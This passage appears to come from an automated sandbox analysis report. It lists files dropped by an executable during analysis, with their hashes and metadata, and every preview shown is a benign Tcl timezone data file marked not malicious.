                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):149
                                                                                                                                                                                                                              Entropy (8bit):5.006390440264841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKjhfMXGm2OHEVPoHsWA0GVFSTVVn:SlSWB9eg/2wKjJDm2OHEVPoH3A0CUX
                                                                                                                                                                                                                              MD5:D6245CAAEC9BA2579F4CEFFF196A9369
                                                                                                                                                                                                                              SHA1:4D182953F2CEEFF3583265F977B14F40C1A2FB43
                                                                                                                                                                                                                              SHA-256:C445B8030DEDDDED0AFF5CC692CC323B63BE8C14BBD42DC3FDE90AD4F9D14785
                                                                                                                                                                                                                              SHA-512:A32C477B6FAA79247907D1C4E2DF400B05AF4B529277C4CE12B33097872311E3F579115DC8CBA93DAC936928FD574414F3473A9CB7C8E85AB57CCA57489B60F8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Urumqi) {.. {-9223372036854775808 21020 0 LMT}.. {-1325483420 21600 0 +06}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.773734429231407
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5petrlfgLv+OC+jsuwltZQONEa2Ggf3augO8UoxLyHdX/CX6bW4Bv/7NKxKG:5Ysv+0j6lua2Gg/3gO8UoOZU2Wc/pKF
                                                                                                                                                                                                                              MD5:5ADD78E4AFCBA913D078A8790861A2DE
                                                                                                                                                                                                                              SHA1:BB63A762D5D76C0FD3CB9AB2BCDE95718E1C99EB
                                                                                                                                                                                                                              SHA-256:9D639C0FC69B3BEEBC96969092F9590EB48E7946E901B225BF245E165973B9A8
                                                                                                                                                                                                                              SHA-512:7C2418FD1F96F101B83E2ABDF2551405C6E429DBBF30A2FA7CD2477E2CE1CEEBB790C51B28AEFF043BA7A7A914CEF3C812668058D69225B9FE9475C56508453D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ust-Nera) {.. {-9223372036854775808 34374 0 LMT}.. {-1579426374 28800 0 +08}.. {354898800 43200 0 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {764694000 43200 1 +12}.. {780418
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):179
                                                                                                                                                                                                                              Entropy (8bit):4.858039387006872
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKgTjEHp4WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKgsX
                                                                                                                                                                                                                              MD5:D23A09C84A5368FBB47174BC0A460D14
                                                                                                                                                                                                                              SHA1:045A72FEA79C75E5F0029BD110E33A022C57DFAB
                                                                                                                                                                                                                              SHA-256:18F5E4FE8247F676278AC5F1912AC401DC48DF5B756D22E76FF1CFA702F88DA7
                                                                                                                                                                                                                              SHA-512:404EABC2FC162E18C678CED063249C7FF4C28653880EA1903CE846FD191CD1C5B61E0610736F250B79BBAC768B1AFD6B9A8824D56D74591A95D7301B47D48387
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Vientiane) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2062
                                                                                                                                                                                                                              Entropy (8bit):3.7094518963173035
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:56beOUYQ7FyDy3le3i96VwAmnuBNuTw6vl9O8nfipRkwhUZDAcD:56cYQBIy343dVNUIukElcXRDhUBAcD
                                                                                                                                                                                                                              MD5:5C0C094B088D0212182E7B944197D4FE
                                                                                                                                                                                                                              SHA1:CF43A511FE9CD295207DF350704462E09D4D5278
                                                                                                                                                                                                                              SHA-256:2558C96E25359C72F168DAC6FB3C16C54F8FD7D0724EEB1671156D4A1F42AC6C
                                                                                                                                                                                                                              SHA-512:5D659EBDC8C2B06C964B083ECC78B4370A4658590D83F020CD23910C44E2D8DAFE69F61E8EB569E1905E89F38CD03ABE6B92F6CE36CF0B1EE0732A7645AFA65D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Vladivostok) {.. {-9223372036854775808 31651 0 LMT}.. {-1487321251 32400 0 +09}.. {-1247562000 36000 0 +11}.. {354895200 39600 1 +11}.. {370702800 36000 0 +10}.. {386431200 39600 1 +11}.. {402238800 36000 0 +10}.. {417967200 39600 1 +11}.. {433774800 36000 0 +10}.. {449589600 39600 1 +11}.. {465321600 36000 0 +10}.. {481046400 39600 1 +11}.. {496771200 36000 0 +10}.. {512496000 39600 1 +11}.. {528220800 36000 0 +10}.. {543945600 39600 1 +11}.. {559670400 36000 0 +10}.. {575395200 39600 1 +11}.. {591120000 36000 0 +10}.. {606844800 39600 1 +11}.. {622569600 36000 0 +10}.. {638294400 39600 1 +11}.. {654624000 36000 0 +10}.. {670348800 32400 0 +10}.. {670352400 36000 1 +10}.. {686077200 32400 0 +09}.. {695754000 36000 0 +11}.. {701798400 39600 1 +11}.. {717523200 36000 0 +10}.. {733248000 39600 1 +11}.. {748972800 36000 0 +10}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2058
                                                                                                                                                                                                                              Entropy (8bit):3.7081033128260934
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5h+r1gIgWH/lt0irzEzCSCItWiIrW+rDQk9CVhyFY7rRWjYuhUmgr2j:K5PhtjLiII2ZFlgm
                                                                                                                                                                                                                              MD5:E43E5F0EA7C4575525BAB130984DCDCC
                                                                                                                                                                                                                              SHA1:2D715749469FEA51A8E25D1F4F8DC4FF9178817D
                                                                                                                                                                                                                              SHA-256:3BEF13638C46F16435D326C675907E61BB68C8173153CED3359E983BE0E413E5
                                                                                                                                                                                                                              SHA-512:27954FEC865031BC363CFDE94E97B3B19836A6F777646EA4AAB12ECCAEE6D60A0C690711EA192B917AC717F94A01D1EF64BAE97DF968069CC12415971B070498
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yakutsk) {.. {-9223372036854775808 31138 0 LMT}.. {-1579423138 28800 0 +08}.. {-1247558400 32400 0 +10}.. {354898800 36000 1 +10}.. {370706400 32400 0 +09}.. {386434800 36000 1 +10}.. {402242400 32400 0 +09}.. {417970800 36000 1 +10}.. {433778400 32400 0 +09}.. {449593200 36000 1 +10}.. {465325200 32400 0 +09}.. {481050000 36000 1 +10}.. {496774800 32400 0 +09}.. {512499600 36000 1 +10}.. {528224400 32400 0 +09}.. {543949200 36000 1 +10}.. {559674000 32400 0 +09}.. {575398800 36000 1 +10}.. {591123600 32400 0 +09}.. {606848400 36000 1 +10}.. {622573200 32400 0 +09}.. {638298000 36000 1 +10}.. {654627600 32400 0 +09}.. {670352400 28800 0 +09}.. {670356000 32400 1 +09}.. {686080800 28800 0 +08}.. {695757600 32400 0 +10}.. {701802000 36000 1 +10}.. {717526800 32400 0 +09}.. {733251600 36000 1 +10}.. {748976400 32400 0 +09}.. {76470
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):244
                                                                                                                                                                                                                              Entropy (8bit):4.692243303623333
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKs5XDm2OHGVQoHvZN6FCDx+UIFDVkvScHbY/s5UIAy:MB862KTmdHGuCvZNNkkHH3Sy
                                                                                                                                                                                                                              MD5:D45766D30074719C9A88ACE8BB53204B
                                                                                                                                                                                                                              SHA1:69B333DFCCCCEB66DD0F7DC28B272BB10769B6B0
                                                                                                                                                                                                                              SHA-256:2526557810747E78E713AE09BC305621A80FAEECF8D441632E7825738D4C79CB
                                                                                                                                                                                                                              SHA-512:5255DEED72D7D13862A4D6BED7E0458C099D2EF5A1B41536CAA7C0E65A61DE8B8D1AD62AD44559F970B6613ADFB3862778D1CC99B9A05CB5BBCA7F0202B5A5B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yangon) {.. {-9223372036854775808 23087 0 LMT}.. {-2840163887 23087 0 RMT}.. {-1577946287 23400 0 +0630}.. {-873268200 32400 0 +09}.. {-778410000 23400 0 +0630}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2095
                                                                                                                                                                                                                              Entropy (8bit):3.704641905144701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5ievNhYvm1qv7vXIovPvSvlDvtvuovKKvKcNvHvAvivBvqvvEyv8vlvEv+v4v+v+:/Nupj40H6l75FKCKcZP8qdyEaoBAWkW+
                                                                                                                                                                                                                              MD5:D4DABA407BB8A10E4961D1DE5D9781D1
                                                                                                                                                                                                                              SHA1:6933DE65336331BD90E2BEC6AEA0609B16DAEDC9
                                                                                                                                                                                                                              SHA-256:2C78699EFC60758B8F8D0D1DEEDFDED5E65C65EBF3082B23E60BDEA8BF8FBCFE
                                                                                                                                                                                                                              SHA-512:459E2187FAA66414F5CE934C335F563DFD2FA5316B86A54D1A29123A0460AFD65B7CE46629BD6A070A14CB6873A28A2F2803DE5FF4F29EA610712EB07FAD303F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yekaterinburg) {.. {-9223372036854775808 14553 0 LMT}.. {-1688270553 13505 0 PMT}.. {-1592610305 14400 0 +04}.. {-1247544000 18000 0 +06}.. {354913200 21600 1 +06}.. {370720800 18000 0 +05}.. {386449200 21600 1 +06}.. {402256800 18000 0 +05}.. {417985200 21600 1 +06}.. {433792800 18000 0 +05}.. {449607600 21600 1 +06}.. {465339600 18000 0 +05}.. {481064400 21600 1 +06}.. {496789200 18000 0 +05}.. {512514000 21600 1 +06}.. {528238800 18000 0 +05}.. {543963600 21600 1 +06}.. {559688400 18000 0 +05}.. {575413200 21600 1 +06}.. {591138000 18000 0 +05}.. {606862800 21600 1 +06}.. {622587600 18000 0 +05}.. {638312400 21600 1 +06}.. {654642000 18000 0 +05}.. {670366800 14400 0 +05}.. {670370400 18000 1 +05}.. {686095200 14400 0 +04}.. {695772000 18000 0 +06}.. {701816400 21600 1 +06}.. {717541200 18000 0 +05}.. {733266000 21600 1 +06}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2029
                                                                                                                                                                                                                              Entropy (8bit):3.6487650030366106
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5O4GeuadYlykbocXcwJUE5iu8JmFebARoc9lVNk7/9bq8dq16b3C9UPBUUUl2ue/:5xKdsUf8mFpNWFnyLCPYmPJSi3sh4
                                                                                                                                                                                                                              MD5:2CFA7C55D0731D24679CA5D5DC716381
                                                                                                                                                                                                                              SHA1:2BB66783D75C71E76409365757980FBC15F53231
                                                                                                                                                                                                                              SHA-256:20871FA6AA959DDFB73D846271B4A568627B564CFC08A11BDD84B98C2F2019A3
                                                                                                                                                                                                                              SHA-512:CAB10A48859B2C0B2CC7C56E0AA530AE7E506A4986BADC5ED974D124BD46DB328B50C423F83FCFD52D31962A249EEFC10351798B86D51EDA500F412C8D42E6BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Yerevan) {.. {-9223372036854775808 10680 0 LMT}.. {-1441162680 10800 0 +03}.. {-405140400 14400 0 +04}.. {354916800 18000 1 +04}.. {370724400 14400 0 +04}.. {386452800 18000 1 +04}.. {402260400 14400 0 +04}.. {417988800 18000 1 +04}.. {433796400 14400 0 +04}.. {449611200 18000 1 +04}.. {465343200 14400 0 +04}.. {481068000 18000 1 +04}.. {496792800 14400 0 +04}.. {512517600 18000 1 +04}.. {528242400 14400 0 +04}.. {543967200 18000 1 +04}.. {559692000 14400 0 +04}.. {575416800 18000 1 +04}.. {591141600 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 10800 0 +03}.. {670374000 14400 1 +03}.. {686098800 10800 0 +03}.. {701823600 14400 1 +03}.. {717548400 10800 0 +03}.. {733273200 14400 1 +03}.. {748998000 10800 0 +03}.. {764722800 14400 1 +03}.. {780447
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9879
                                                                                                                                                                                                                              Entropy (8bit):3.557602151081988
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:K35nZPOUYySoluItljncxelTMwtrayE6x5sETNek/CyNzybxYKmX6SXL/XbEcygI:K940pb6cL/b3Ldr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:E7F2A3EE0362E9ED3ECBAD24168AD098
                                                                                                                                                                                                                              SHA1:98832274F6D9B641B809123D1272A1C04EEAA177
                                                                                                                                                                                                                              SHA-256:6B3609BE4E93D21A2AB492594EDD387931E2C787E8471C9F2D3A677F34002D8F
                                                                                                                                                                                                                              SHA-512:C48A76F8251AE455C759CB98802E40B3BEF716FD8E7441B6DE0242942C913367E3572B7C871082E97CA9BE67EC7DC37F8D01C438965217AC0EC36AD508DCE0D4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Azores) {.. {-9223372036854775808 -6160 0 LMT}.. {-2713904240 -6872 0 HMT}.. {-1830376800 -7200 0 -02}.. {-1689548400 -3600 1 -01}.. {-1677794400 -7200 0 -02}.. {-1667430000 -3600 1 -01}.. {-1647730800 -7200 0 -02}.. {-1635807600 -3600 1 -01}.. {-1616194800 -7200 0 -02}.. {-1604358000 -3600 1 -01}.. {-1584658800 -7200 0 -02}.. {-1572735600 -3600 1 -01}.. {-1553036400 -7200 0 -02}.. {-1541199600 -3600 1 -01}.. {-1521500400 -7200 0 -02}.. {-1442444400 -3600 1 -01}.. {-1426806000 -7200 0 -02}.. {-1379286000 -3600 1 -01}.. {-1364770800 -7200 0 -02}.. {-1348441200 -3600 1 -01}.. {-1333321200 -7200 0 -02}.. {-1316386800 -3600 1 -01}.. {-1301266800 -7200 0 -02}.. {-1284332400 -3600 1 -01}.. {-1269817200 -7200 0 -02}.. {-1221433200 -3600 1 -01}.. {-1206918000 -7200 0 -02}.. {-1191193200 -3600 1 -01}.. {-1175468400 -7200 0 -02}.. {-1127689
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8784
                                                                                                                                                                                                                              Entropy (8bit):3.833553120942514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZRBHksL3zq6bCvyjvspNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/+:ft0CC
                                                                                                                                                                                                                              MD5:B04E22B9B42722013941169B5D04DEA2
                                                                                                                                                                                                                              SHA1:32B96A7D9504D5022A6C4E2D310E95B5F062947F
                                                                                                                                                                                                                              SHA-256:099C3BEFBA3B4C00AE19BC53D475A52B32FAC9B36EC823C8EAEFC7D00F78F388
                                                                                                                                                                                                                              SHA-512:8B93BCA1E923B7A43F2EB0889216E8FF991D13CB8D25BD300310ED7CD8537DBD858E8F422C9B52AE2F52F7C1CB450EF0B7C5C1B3AE547C9C1E18E2A851569DD5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Bermuda) {.. {-9223372036854775808 -15558 0 LMT}.. {-2524506042 -15558 0 BMT}.. {-1664307642 -11958 1 BMT}.. {-1648932042 -15558 0 BMT}.. {-1632080442 -11958 1 BMT}.. {-1618692042 -15558 0 BST}.. {-1262281242 -14400 0 AT}.. {-882727200 -10800 1 ADT}.. {-858538800 -14400 0 AST}.. {-845229600 -10800 1 ADT}.. {-825879600 -14400 0 AST}.. {-814384800 -10800 1 ADT}.. {-793825200 -14400 0 AST}.. {-782935200 -10800 1 ADT}.. {-762375600 -14400 0 AST}.. {-713988000 -10800 1 ADT}.. {-703710000 -14400 0 AST}.. {-681933600 -10800 1 ADT}.. {-672865200 -14400 0 AST}.. {-650484000 -10800 1 ADT}.. {-641415600 -14400 0 AST}.. {-618429600 -10800 1 ADT}.. {-609966000 -14400 0 AST}.. {-586980000 -10800 1 ADT}.. {-578516400 -14400 0 AST}.. {-555530400 -10800 1 ADT}.. {-546462000 -14400 0 AST}.. {-429127200 -10800 1 ADT}.. {-415825200 -14400 0 AST}.. {1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6856
                                                                                                                                                                                                                              Entropy (8bit):3.8064107143060752
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KXVuHfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:KXVQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:8ABD279386C50705C074EEE18BF5AE59
                                                                                                                                                                                                                              SHA1:C392231DBE744F5942DA4BFAC8AD0ABEBAEA0BF3
                                                                                                                                                                                                                              SHA-256:2026944DCDEBC52F64405E35119F4CF97EA9AA1E769498730880B03F29A2B885
                                                                                                                                                                                                                              SHA-512:3095759D01AC7EEA25E427CA38E8A0395BEFA7250E7A0C1327BF9D61F07F4570CDF7313FBE6695973EB0DD66D201C6C63591CC0DA8A1E0029926DC7056F4C95B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Canary) {.. {-9223372036854775808 -3696 0 LMT}.. {-1509663504 -3600 0 -01}.. {-733874400 0 0 WET}.. {323827200 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):246
                                                                                                                                                                                                                              Entropy (8bit):4.637993677747699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2RQ7RfDm2OHDoH1JlvQV/FFrR3FcykVvQV/FFf+nmwV:MB86267RLmdHDC1w/FH3FcyL/FomwV
                                                                                                                                                                                                                              MD5:1581C6470850E0C9DB204975488B1AF8
                                                                                                                                                                                                                              SHA1:6933ED13F18AD785CEDF0837F86EFAC671297A85
                                                                                                                                                                                                                              SHA-256:2EA59ACDB5BBDD3C6ABCEEA456838A5CA57371A3D2BB93604B37F998ED8B9D4D
                                                                                                                                                                                                                              SHA-512:9FFFA013D82CEFF6F447521C19270ECDD71152F23670164423E6013FEC46253C62D2CB79B42630BD786BD113F27369E746CA981DD17E789F7571F473B47247C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Cape_Verde) {.. {-9223372036854775808 -5644 0 LMT}.. {-1830376800 -7200 0 -02}.. {-862610400 -3600 1 -01}.. {-764118000 -7200 0 -02}.. {186120000 -3600 0 -01}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.709193799640151
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqLG4E23vXHAIgvMG4EeRRL/2RQqG4EZrB/4RQqG4E1n:SlSWB9vsM3yCPHAIgvoRN/2RQ1rB/4Ri
                                                                                                                                                                                                                              MD5:601EB889A87F9CAD6F1DF4D1AB009FAE
                                                                                                                                                                                                                              SHA1:EB43C253A48755442A67A2408D7E3295549F831C
                                                                                                                                                                                                                              SHA-256:64FB8CAD17CD36666C7027AAD01344FEF659B13699EEF1942365842F8ED2170E
                                                                                                                                                                                                                              SHA-512:9CFC4A446ED6A3BEF6C26AE57324F10A970EE2ADD6933130447FAD6A3DB538841F2490DD461AF5776FACD9BD2CDC4A83247DFA6B34802AE844DDC6D4C37B28EA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Atlantic/Faroe)]} {.. LoadTimeZoneFile Atlantic/Faroe..}..set TZData(:Atlantic/Faeroe) $TZData(:Atlantic/Faroe)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6796
                                                                                                                                                                                                                              Entropy (8bit):3.804838552487436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:96ufXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:/bkIaFF1w0us4qE3+sSGjT
                                                                                                                                                                                                                              MD5:F97CC7EB9C52D00177BFF4715832FCD5
                                                                                                                                                                                                                              SHA1:CD9DCBB5E6ADD6EA91C8F142957EC229FC7F6DA3
                                                                                                                                                                                                                              SHA-256:795F438E7F01342D5F25ECCDD09FCE65C03C5D2D561B9B5191301D57EC16B850
                                                                                                                                                                                                                              SHA-512:9586289FEB6C597160011A47432F0AC40000483FA2E579BD89046EFD33E98DDAD652B792FD80CEDEB4CD87B6439A7B473F25F1B7375BC75353CBAF9F77E1084E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Atlantic/Faroe) {.. {-9223372036854775808 -1624 0 LMT}.. {-1955748776 0 0 WET}.. {347155200 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}.. {749005200 0 0 WET}.. {764730000 3600 1 WEST}.. {780454800 0 0 WET}.. {796179600 3600 1 WEST}.. {811904400 0 0 WET}.. {828234000 3600
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.957633978425468
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV/y+YF3vXHAIgoq8yFRRL/2RQqG0EHEcAg/h8QahV:SlSWB9vsM3ymhVoPHAIgoh6N/2RQaK85
                                                                                                                                                                                                                              MD5:95C2D55CCE5809089CDB041EA3D464F8
                                                                                                                                                                                                                              SHA1:B395F5F26CE979BDF2B9E2CB51C06929AED11A6C
                                                                                                                                                                                                                              SHA-256:11BF0746F95BA01807D3B34C8FAE3FF4AE9DB5E4E6BC0CB8B36906CC3F44EDE5
                                                                                                                                                                                                                              SHA-512:AB2BE22E95A7C36E18EBA1BB63B3930A523ED793E43A3F597A8F63AE2F0E44436C39144BC136E7E5716D7FCBFAE7F1FAF36BCFFCF9C8D51151FF25BB14D6F8B5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Berlin)]} {.. LoadTimeZoneFile Europe/Berlin..}..set TZData(:Atlantic/Jan_Mayen) $TZData(:Europe/Berlin)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
